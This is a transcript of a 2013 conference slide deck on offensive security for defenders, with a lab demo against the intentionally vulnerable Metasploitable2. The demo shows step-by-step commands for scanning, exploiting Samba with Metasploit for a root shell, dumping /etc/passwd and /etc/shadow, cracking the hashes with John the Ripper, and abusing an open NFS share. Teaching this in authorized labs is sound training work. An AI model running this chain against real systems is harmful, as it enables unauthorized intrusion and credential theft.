Your SlideShare is downloading. ×
The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

The best defense is a good offense (April 2013 Presentation to Atlantic HTCIA chapter)

923
views

Published on

Published in: Technology

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
923
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
12
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. “Improving your defensive security posture with offensive security strategies” Andrew Kozma HTCIA, Atlantic Chapter Meeting April 18th, 2013
  • 2. A bit about me…  Infosec professional working in healthcare  Co-founder of AtlSecCon  Midnight ethical hacker  A perpetual student  Security researcher/philosopher  Fan of the blues (Secretly want to learn how to play the harmonica)
  • 3. Offensive Security  “How much can you know about yourself if you've never been in a fight?” ~Chuck Palahniuk, Fight Club  Hacking our own infrastructure to improve defensive security measures and processes  Tools – Kali Linux, a security distro maintained by Offensive- Security with all the tools required to test security, it’s free and always will be  Tactics – The application of tools  Strategy – The big picture, all the pieces working together to achieve an ultimate goal
  • 4. Creating a practice environment  “The first rule of fight club is, you don't talk about fight club.” ~Chuck Palahniuk, Fight Club  The goal - a controlled environment where it is safe to practice offensive security techniques  There are many vulnerable distributions that can serve as targets to help build skills (@g0tmi1k’s www.vulnhub.com)  With proper planning and authorization along with an understanding of the risks you can test production infrastructure  Virtualization is a beautiful thing!
  • 5. Demo (metasploitable2)  NMAP Scan  Identify OS, Services and open ports  Nessus Vuln Scan  Run a scan to find vulnerabilities that can potentially be exploited  Metasploit console  Import the info  Exploit the target  Post exploitation  Crack passwords with john  PWN the box
  • 6. Demo (nmap) • Scanning with nmap -O OS Detection -sV Service Version -sC NSE Scripts -oX Output in xml format --stylesheet nmap.xsl --open --reason • Copying the stylesheet to our working directory • Displaying the nmap scan in Iceweasel (Kali-Linux Browser)
  • 7. Demo (nmap output)
  • 8. Demo (Nessus) • Nessus Vulnerability Scanner • Not native to Kali-Linux • Download and install • dpkg –i “filename” • Register for Home feed (free) • Connect to Local host port 8834 • Login and select new scan
  • 9. Demo (Nessus) • Launch the scan • Nessus indicates the scan progress • A summary is displayed once the scan is complete
  • 10. Demo (Nessus) • Export and save the report
  • 11. Demo (Nessus Output)
  • 12. Demo (metasploit) • Opening the Metasploit Framework Console • Enter the command “msfconsole” • Importing our nmap scan results into the metasploit database • Enter the command “db_import /path to the nmap scan”
  • 13. Demo (metasploit) • We can validate the db_import by entering the command “hosts” at the msf prompt • We can also validate the services imported for that host from nmap by entering the command “services” at an msf prompt.
  • 14. Demo (metasploit) • Import the nessus scan into metasploit with command “db_import /path to the file” • Now that it is imported into metasploit we can view the vulnerabilities that nessus detected with the command “vulns”
  • 15. Demo (metasploit) • For this demo we are going to exploit samba • Load the exploit in msf with the command: “use exploit/multi/samba/usermap_script” • Once the exploit is loaded we can learn more about its functions via the command “info”
  • 16. Demo (metasploit) • The command: “show options” indicates any variables that require a value to be set • For this exploit a Remote Host is required to be identified. We will use the command: “set RHOST target.ip.address” • A payload that will be delivered to the target is required we issue the command “set PAYLOAD cmd/unix/bind/netcat”
  • 17. Demo (metasploit) • The command “show options” now indicates the variables for RHOST and PAYLOAD that we previously defined
  • 18. Demo (metasploit) • We attack the target via the command “exploit” • Booyah! Shell access to the target! • We have root level access to the target and interact via this shell • Let’s display the target systems user accounts via the command “cat /etc/passwd” • We are going to select the data displayed and copy it to a .txt file
  • 19. Demo (metasploit) • Now we need to grab the hashes associated with the user accounts we just viewed • This can be done by displaying the hashes via the command “cat /etc/shadow” • Once again we will be selecting the information displayed and will be copying it to a .txt file
  • 20. Demo (Usernames and Hashes)
  • 21. Demo (John The Ripper) • We are going to use John The Ripper to crack the passwords for the user accounts • For John to crack them we have to combine the usernames and their hash into a format that John can understand • We combine both files to a single one for John to crack with the command: “unshadow /path/passwd.txt /path/shadow.txt > unshadowed.txt” • We now have a file with usernames and hashes that John can use
  • 22. Demo (John The Ripper) • We are going to take a quick peek at the contents of the new file • To do this we change to directory the file resides in “cd HTCIA” • We can display the contents of this file in the terminal with the command “cat unshadowed.txt”
  • 23. Demo (John The Ripper) • To start cracking the password with John we issue the command: “john /path to the filename.txt” • John has loaded the hashes and has successfully cracked some of the passwords • Previously cracked passwords can be viewed with the command: “john –show /Path to the file.txt”
  • 24. Demo (Post Exploitation) • Using our new creds to SSH to the exploited workstation • To connect via SSH we use the command: “ssh –l msfadmin Target.IP.Address” • Now we have a terminal session vs a shell • In the real world we could continue to install backdoors, steal data, pivot to scan for other hosts
  • 25. Demo (Post Exploitation) • Lets review other services so that we can maintain a persistent presence on the compromised workstation • Hmmm NFS services are running on the target…
  • 26. Demo (Post Exploitation) • Lets take a quick look at the NFS share available on the target • Uh oh… everything is shared • We are going to create a temp directory and then mount the share in it • Lets display the filesystem to see the NFS share mounted in temp
  • 27. Demo (Post Exploitation) • Looking into the share that we mounted… • We already know we can copy the contents of the passwd and shadow files again
  • 28. Demo (Post Exploitation) • Remember our Nessus output • Collect as much information as possible during the information gathering phase… • Sometimes you get lucky! The VNC server password was identified in the scan by Nessus
  • 29. Breaking things to make them better  “At the time, my life just seemed too complete, and maybe we have to break everything to make something better out of ourselves.” ~Chuck Palahniuk, Fight Club  When you start looking at production systems it is important to have a demonstrated, repeatable process that has buy in from management  Document your findings indicating the threat, the likelihood of occurrence and the impact to the business  Use this information to build business cases for investment in security solutions  When you start looking at the production environment… there will be blood….
  • 30. Advanced Persistent Response  “On a long enough time line, the survival rate for everyone drops to zero.” ~Chuck Palahniuk, Fight Club  Understanding trends and current threats  Filling in the gaps with security (Technology and process)  Creating and implementing a security model that meets organizational needs
  • 31. Incident Response  "With a gun barrel between your teeth, you speak only in vowels.“ ~Chuck Palahniuk, Fight Club  Preparation  Have a plan, know who to call and when  Identification  Determination of whether or not there was an incident  Containment  Protecting other critical systems “stop the bleeding”  Eradication  Addressing the vulnerabilities that were exploited  Recovery  Returning to operational status  Follow up  Lessons learned, prevent future incidents of the same nature
  • 32. Parting thoughts  Do you still think the best defense is a good offense?  IMHO ~ A good offense helps to make a great defense! (with proper planning and execution)
  • 33. References  Jeremy Druin @webpwnized has a great tutorial online going into more detail: http://www.youtube.com/watch?v=0fbBwGAuINw  @netbiosx has a tutorial available online regarding NFS and metasploitable2: http://pentestlab.wordpress.com/2013/01/20/nfs-misconfiguration/  Nessus software and home feed licensing can be found on their site: http://www.tenable.com/  Kali-Linux can be obtained at www.kali.org and is maintained by Offensive-Security  Metasploitable2 is maintained by Rapid7 and is available for download from: https://community.rapid7.com/docs/DOC-1875  Why stop here! There are many other distros to help expand your skillset, check out @g0tmi1k and his website at http://vulnhub.com/
  • 34. Thank you  Twitter handle - @k0z1can  ca.linkedin.com/in/andrewkozma/

×